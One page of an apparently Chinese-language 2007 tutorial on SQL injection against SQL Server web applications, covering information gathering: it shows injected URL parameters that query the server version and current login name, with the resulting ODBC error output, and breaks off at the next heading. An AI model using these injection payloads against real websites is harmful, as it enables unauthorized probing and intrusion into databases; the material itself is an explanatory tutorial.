打印本文 打印本文 关闭窗口 关闭窗口
基于SQL Server的WEB应用程序注入攻击详细介绍
作者:武汉SEO闵涛  文章来源:敏韬网  点击数11367  更新时间:2007/11/14 11:56:57  文章录入:mintao  责任编辑:mintao
请输入正确的参数值。

ADODB.Parameter error ''''800a0d5d''''

Application uses a value of the wrong type for the current operation.

 

 

三、搜集信息

确定可以实施注入攻击后,可以使用下面的方法对服务器进行测试。

 

测试SQL Server版本:

article_show.asp?ID=(SELECT @@VERSION)

Microsoft OLE DB Provider for ODBC Drivers 错误 ''''80040e07''''

[Microsoft][ODBC SQL Server Driver][SQL Server] nvarchar ''''Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) '''' 转换为数据类型为 int 的列时发生语法错误。

 

测试SQL Server当前的登录用户名:

article_show.asp?ID=(USER_NAME())

Microsoft OLE DB Provider for ODBC Drivers 错误 ''''80040e07''''

[Microsoft][ODBC SQL Server Driver][SQL Server] nvarchar ''''webuser'''' 转换为数据类型为 int 的列时发生语法错误。

注意:如果是以sa登录的在这里将显示dbo

 

测试

上一页  [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]  ...  下一页 >> 

打印本文 打印本文 关闭窗口 关闭窗口